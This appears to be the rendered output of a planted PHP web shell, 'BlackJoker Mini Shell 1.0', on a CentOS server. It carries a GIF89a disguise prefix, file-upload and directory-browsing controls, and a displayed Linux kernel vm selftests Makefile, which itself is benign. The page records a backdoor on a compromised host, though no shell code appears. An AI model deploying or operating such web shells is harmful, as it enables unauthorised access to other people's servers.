GIF89a; Mini Shell

Mini Shell

Direktori : /lib/modules/3.10.0-1160.83.1.el7.centos.plus.x86_64/source/tools/testing/selftests/vm/
Upload File :
Current File : //lib/modules/3.10.0-1160.83.1.el7.centos.plus.x86_64/source/tools/testing/selftests/vm/Makefile

# Makefile for vm selftests

CC = $(CROSS_COMPILE)gcc
CFLAGS = -Wall

all: hugepage-mmap hugepage-shm  map_hugetlb thuge-gen
%: %.c
	$(CC) $(CFLAGS) -o $@ $^

run_tests: all
	@/bin/sh ./run_vmtests || echo "vmtests: [FAIL]"

clean:
	$(RM) hugepage-mmap hugepage-shm  map_hugetlb

./BlackJoker Mini Shell 1.0